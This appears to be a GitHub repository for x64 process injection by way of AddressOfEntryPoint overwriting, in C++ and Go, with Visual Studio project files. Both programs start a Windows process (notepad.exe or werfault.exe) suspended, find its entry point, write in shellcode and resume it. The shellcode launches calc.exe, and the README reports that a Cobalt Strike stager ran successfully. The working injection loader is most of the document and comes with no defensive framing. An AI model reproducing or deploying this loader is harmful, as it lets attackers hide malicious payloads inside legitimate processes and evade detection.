├── README.md
├── entrypoint.cpp
├── entrypoint.sln
├── entrypoint.vcxproj
├── entrypoint.vcxproj.filters
├── entrypoint.vcxproj.user
└── golang
    ├── AddressOfEntryPoint.go
    ├── go.mod
    └── go.sum


/README.md:
--------------------------------------------------------------------------------
1 | # AddressOfEntryPoint-injection
2 | x64 version of https://www.ired.team/offensive-security/code-injection-process-injection/addressofentrypoint-code-injection-without-virtualallocex-rwx
3 | 
4 | Pop calc.exe success
5 | 
6 | Cobalt Strike Stager execute Success
7 | 


--------------------------------------------------------------------------------
/entrypoint.cpp:
--------------------------------------------------------------------------------
 1 | #include <iostream>
 2 | #include <windows.h>
 3 | #include <winternl.h>
 4 | #pragma comment(lib, "ntdll")
 5 | 
 6 | using namespace std;
 7 | 
 8 | int main()
 9 | {
10 | 	//x64 calc.exe
11 | 	unsigned char shellcode[] ="\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\x59\x50\x40\x92\x74\x15\x51\x64\x8b\x72\x2f\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\xb2\x50\xeb\x1a\xb2\x60\x48\x29\xd4\x65\x48\x8b\x32\x48\x8b\x76\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x03\x57\x3c\x8b\x5c\x17\x28\x8b\x74\x1f\x20\x48\x01\xfe\x8b\x54\x1f\x24\x0f\xb7\x2c\x17\x8d\x52\x02\xad\x81\x3c\x07\x57\x69\x6e\x45\x75\xef\x8b\x74\x1f\x1c\x48\x01\xfe\x8b\x34\xae\x48\x01\xf7\x99\xff\xd7";
12 | 
13 | 	STARTUPINFOA si;
14 | 	si = {};
15 | 	PROCESS_INFORMATION pi = {};
16 | 	PROCESS_BASIC_INFORMATION pbi = {};
17 | 	DWORD returnLength = 0;
18 | 	CreateProcessA(0, (LPSTR)"c:\\windows\\system32\\notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);
19 | 
20 | 	// get target image PEB address and pointer to image base
21 | 	NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLength);
22 | 
23 | 	//x86:DWORD pebOffset = (DWORD)pbi.PebBaseAddress + 8;
24 | 	DWORD_PTR pebOffset = (DWORD_PTR)pbi.PebBaseAddress + 0x10;
25 | 
26 | 	// get target process image base address
27 | 	LPVOID imageBase = 0;
28 | 	//x86:ReadProcessMemory(pi.hProcess, (LPCVOID)pebOffset, &imageBase, 4, NULL);
29 | 	ReadProcessMemory(pi.hProcess, (LPCVOID)pebOffset, &imageBase, sizeof(LPVOID), NULL);;
30 | 
31 | 	// read target process image headers
32 | 	BYTE headersBuffer[4096] = {};
33 | 	ReadProcessMemory(pi.hProcess, (LPCVOID)imageBase, headersBuffer, 4096, NULL);
34 | 
35 | 	// get AddressOfEntryPoint
36 | 	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)headersBuffer;
37 | 	//x86:PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
38 | 	PIMAGE_NT_HEADERS64 ntHeader = (PIMAGE_NT_HEADERS64)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
39 | 	LPVOID codeEntry = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)imageBase);
40 | 
41 | 	// Do something with the AddressOfEntryPoint(print to console in this case)
42 | 	cout << codeEntry << endl;
43 | 
44 | 	// write shellcode to image entry point and execute it
45 | 	WriteProcessMemory(pi.hProcess, codeEntry, shellcode, sizeof(shellcode), NULL);
46 | 	ResumeThread(pi.hThread);
47 | 
48 | 	return 0;
49 | }
50 | 


--------------------------------------------------------------------------------
/entrypoint.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31410.357
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "entrypoint", "entrypoint.vcxproj", "{518CBE60-699A-4E3C-8EAB-3E7D3B698961}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Debug|x64.Build.0 = Debug|x64
18 | 		{518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Debug|x86.Build.0 = Debug|Win32
20 | 		{518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Release|x64.ActiveCfg = Release|x64
21 | 		{518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Release|x64.Build.0 = Release|x64
22 | 		{518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Release|x86.ActiveCfg = Release|Win32
23 | 		{518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {326960E6-C8C3-42D1-9F5C-FB0B8E2B548C}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/entrypoint.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{518cbe60-699a-4e3c-8eab-3e7d3b698961}</ProjectGuid>
 25 |     <RootNamespace>entrypoint</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>true</ConformanceMode>
119 |     </ClCompile>
120 |     <Link>
121 |       <SubSystem>Console</SubSystem>
122 |       <GenerateDebugInformation>true</GenerateDebugInformation>
123 |     </Link>
124 |   </ItemDefinitionGroup>
125 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
126 |     <ClCompile>
127 |       <WarningLevel>Level3</WarningLevel>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <SDLCheck>true</SDLCheck>
131 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132 |       <ConformanceMode>true</ConformanceMode>
133 |     </ClCompile>
134 |     <Link>
135 |       <SubSystem>Console</SubSystem>
136 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
137 |       <OptimizeReferences>true</OptimizeReferences>
138 |       <GenerateDebugInformation>true</GenerateDebugInformation>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemGroup>
142 |     <ClCompile Include="entrypoint.cpp" />
143 |   </ItemGroup>
144 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
145 |   <ImportGroup Label="ExtensionTargets">
146 |   </ImportGroup>
147 | </Project>


--------------------------------------------------------------------------------
/entrypoint.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="源文件">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="头文件">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="资源文件">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="entrypoint.cpp">
19 |       <Filter>源文件</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/entrypoint.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/golang/AddressOfEntryPoint.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | import (
  4 | 	"debug/pe"
  5 | 	"encoding/binary"
  6 | 	"fmt"
  7 | 	"golang.org/x/sys/windows"
  8 | 	"os"
  9 | 	"strconv"
 10 | 	"syscall"
 11 | 	"unsafe"
 12 | )
 13 | 
 14 | //IMAGE_NT_HEADERS64 type
 15 | type IMAGE_NT_HEADERS64 struct {
 16 | 	Signature      uint32
 17 | 	FileHeader     pe.FileHeader
 18 | 	OptionalHeader pe.OptionalHeader64
 19 | }
 20 | 
 21 | 
 22 | 
 23 | type ImageDosHeader struct {
 24 | 	E_magic uint16
 25 | 	E_cblp uint16
 26 | 	E_cp uint16
 27 | 	E_crlc uint16
 28 | 	E_cparhdr uint16
 29 | 	Eminalloc uint16
 30 | 	E_maxalloc uint16
 31 | 	E_ss uint16
 32 | 	E_sp uint16
 33 | 	E_csum uint16
 34 | 	Eip uint16
 35 | 	E_cs uint16
 36 | 	E_lfarlc uint16
 37 | 	E_ovno uint16
 38 | 	E_res []uint16
 39 | 	E_oemid uint16
 40 | 	E_oeminfo uint16
 41 | 	E_res2 []uint16
 42 | 	E_lfanew uint32
 43 | }
 44 | type PImageDosHeader *ImageDosHeader
 45 | 
 46 | func NewImageDosHeader(data []byte) *ImageDosHeader {
 47 | 	image_dos_header := new(ImageDosHeader)
 48 | 	image_dos_header.Parse(data)
 49 | 	return image_dos_header
 50 | }
 51 | 
 52 | func (h *ImageDosHeader) Parse(data []byte) {
 53 | 	h.E_magic = binary.LittleEndian.Uint16(data[0:2])
 54 | 	h.E_cblp = binary.LittleEndian.Uint16(data[2:4])
 55 | 	h.E_cp = binary.LittleEndian.Uint16(data[4:6])
 56 | 	h.E_crlc = binary.LittleEndian.Uint16(data[6:8])
 57 | 	h.E_cparhdr = binary.LittleEndian.Uint16(data[8:10])
 58 | 	h.Eminalloc = binary.LittleEndian.Uint16(data[10:12])
 59 | 	h.E_maxalloc = binary.LittleEndian.Uint16(data[12:14])
 60 | 	h.E_ss = binary.LittleEndian.Uint16(data[14:16])
 61 | 	h.E_sp = binary.LittleEndian.Uint16(data[16:18])
 62 | 	h.E_csum = binary.LittleEndian.Uint16(data[18:20])
 63 | 	h.Eip = binary.LittleEndian.Uint16(data[20:22])
 64 | 	h.E_cs = binary.LittleEndian.Uint16(data[22:24])
 65 | 	h.E_lfarlc = binary.LittleEndian.Uint16(data[24:26])
 66 | 	h.E_ovno = binary.LittleEndian.Uint16(data[26:28])
 67 | 	for i := 0; i < 8; i+=2 {
 68 | 		h.E_res = append(
 69 | 			h.E_res,
 70 | 			binary.LittleEndian.Uint16(data[28+i:30+i]),
 71 | 		)
 72 | 	}
 73 | 
 74 | 	h.E_oemid = binary.LittleEndian.Uint16(data[36:38])
 75 | 	h.E_oeminfo = binary.LittleEndian.Uint16(data[38:40])
 76 | 	for i := 0; i < 20; i+=2 {
 77 | 		h.E_res2 = append(
 78 | 			h.E_res2,
 79 | 			binary.LittleEndian.Uint16(data[40+i:42+i]),
 80 | 		)
 81 | 	}
 82 | 	h.E_lfanew = binary.LittleEndian.Uint32(data[60:64])
 83 | }
 84 | 
 85 | 
 86 | 
 87 | 
 88 | var shellcode = []byte{
 89 | 	//calc.exe https://github.com/peterferrie/win-exec-calc-shellcode
 90 | 	0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
 91 | 	0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51,
 92 | 	0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b,
 93 | 	0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18,
 94 | 	0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29,
 95 | 	0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76,
 96 | 	0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48,
 97 | 	0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57,
 98 | 	0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f,
 99 | 	0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24,
100 | 	0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad,
101 | 	0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75,
102 | 	0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe,
103 | 	0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff,
104 | 	0xd7,
105 | }
106 | 
107 | 
108 | func main(){
109 | 	cmdline := "c:\\windows\\system32\\werfault.exe -u -p " + strconv.Itoa(os.Getpid())
110 | 	fmt.Println(cmdline)
111 | 	cmd := syscall.StringToUTF16Ptr(cmdline)
112 | 	var si windows.StartupInfo
113 | 	var pi windows.ProcessInformation
114 | 
115 | 	var info int32
116 | 	var pbi windows.PROCESS_BASIC_INFORMATION
117 | 	var returnLen uint32 = 0
118 | 	var SizeOfProcessBasicInformationStruct = unsafe.Sizeof(windows.PROCESS_BASIC_INFORMATION{})
119 | 
120 | 	windows.CreateProcess(nil,cmd,nil,nil,false,windows.CREATE_SUSPENDED,nil,nil,&si,&pi)
121 | 
122 | 	windows.NtQueryInformationProcess(pi.Process,info,unsafe.Pointer(&pbi),uint32(SizeOfProcessBasicInformationStruct),&returnLen)
123 | 
124 | 	pebOffset:= uintptr(unsafe.Pointer(pbi.PebBaseAddress))+0x10
125 | 
126 | 	var imageBase uintptr = 0
127 | 	k32 := syscall.NewLazyDLL("kernel32")
128 | 	ReadProcessMemory := k32.NewProc("ReadProcessMemory")
129 | 
130 | 	ReadProcessMemory.Call(uintptr(pi.Process),pebOffset, uintptr(unsafe.Pointer(&imageBase)),8,0)
131 | 
132 | 	headersBuffer := make([]byte,4096)
133 | 
134 | 	ReadProcessMemory.Call(uintptr(pi.Process),imageBase,uintptr(unsafe.Pointer(&headersBuffer[0])),4096,0)
135 | 
136 | 	h1:= fmt.Sprintf("0x%x", imageBase)
137 | 	fmt.Println("imageBase:",h1)
138 | 	h2:= fmt.Sprintf("0x%x", pebOffset)
139 | 	fmt.Println("pebOffset:",h2)
140 | 	h3:= fmt.Sprintf("0x%x", uintptr(unsafe.Pointer(&headersBuffer[0])))
141 | 	fmt.Println("headersBuffer:",h3)
142 | 
143 | 
144 | 
145 | 	// get AddressOfEntryPoint
146 | 	//PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)headersBuffer;
147 | 	var dos_header PImageDosHeader
148 | 	dos_header = NewImageDosHeader(headersBuffer)
149 | 
150 | 	//PIMAGE_NT_HEADERS64 ntHeader = (PIMAGE_NT_HEADERS64)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
151 | 	nt_Header := uintptr(unsafe.Pointer(&headersBuffer[0])) + uintptr(dos_header.E_lfanew)
152 | 	ntHeader := (*IMAGE_NT_HEADERS64)(unsafe.Pointer(nt_Header))
153 | 	//LPVOID codeEntry = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)imageBase);
154 | 	codeEntry := uintptr(ntHeader.OptionalHeader.AddressOfEntryPoint)+imageBase
155 | 
156 | 	h:= fmt.Sprintf("0x%x", codeEntry)
157 | 	fmt.Println("AddressOfEntryPoint:",h)
158 | 
159 | 	//WriteProcessMemory := k32.NewProc("WriteProcessMemory")
160 | 	//WriteProcessMemory.Call(uintptr(pi.Process), codeEntry, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)),0)
161 | 
162 | 
163 | 	NTWVM := syscall.NewLazyDLL("ntdll").NewProc("NtWriteVirtualMemory")
164 | 	NtProtectVirtualMemory := syscall.NewLazyDLL("ntdll").NewProc("NtProtectVirtualMemory")
165 | 
166 | 	var old uintptr
167 | 	NtProtect(NtProtectVirtualMemory,uintptr(pi.Process),codeEntry,uintptr(len(shellcode)),syscall.PAGE_READWRITE,&old)
168 | 
169 | 
170 | 	NTWVM.Call(uintptr(pi.Process),codeEntry,uintptr(unsafe.Pointer(&shellcode[0])),uintptr(len(shellcode)),0)
171 | 
172 | 	NtProtect(NtProtectVirtualMemory,uintptr(pi.Process),codeEntry,uintptr(len(shellcode)),old,&old)
173 | 
174 | 	windows.ResumeThread(pi.Thread)
175 | 
176 | }
177 | 
178 | 
179 | 
180 | func NtProtect(NtProtectVirtualMemory *syscall.LazyProc,pHndl uintptr,targetPtr uintptr, sSize uintptr,protect uintptr,oldProtect *uintptr)(uintptr,uintptr,error){
181 | 	r1,r2,lastErr := NtProtectVirtualMemory.Call(
182 | 		pHndl,
183 | 		uintptr(unsafe.Pointer((*uintptr)(unsafe.Pointer(&targetPtr)))),
184 | 		uintptr((unsafe.Pointer(&sSize))),
185 | 		protect,
186 | 		uintptr((unsafe.Pointer(oldProtect))),
187 | 	)
188 | 	return r1,r2,lastErr
189 | }
190 | 
191 | 


--------------------------------------------------------------------------------
/golang/go.mod:
--------------------------------------------------------------------------------
1 | module entrypoint
2 | 
3 | go 1.16
4 | 
5 | require (
6 | 	github.com/soyum2222/editPE v0.0.0-20210624070249-c6fb60af2160
7 | 	golang.org/x/sys v0.0.0-20210906170528-6f6e22806c34
8 | )
9 | 


--------------------------------------------------------------------------------
/golang/go.sum:
--------------------------------------------------------------------------------
1 | github.com/soyum2222/editPE v0.0.0-20210624070249-c6fb60af2160 h1:4qLL5A+f9VE4R7H5viRlBI/ax/oxkLsphN2grtAaLFY=
2 | github.com/soyum2222/editPE v0.0.0-20210624070249-c6fb60af2160/go.mod h1:++uT61R9lWv7RD8YmtMk76ck2N9FYhRkgah3bmHkSBU=
3 | golang.org/x/sys v0.0.0-20210906170528-6f6e22806c34 h1:GkvMjFtXUmahfDtashnc1mnrCtuBVcwse5QV2lUk/tI=
4 | golang.org/x/sys v0.0.0-20210906170528-6f6e22806c34/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
5 | 


--------------------------------------------------------------------------------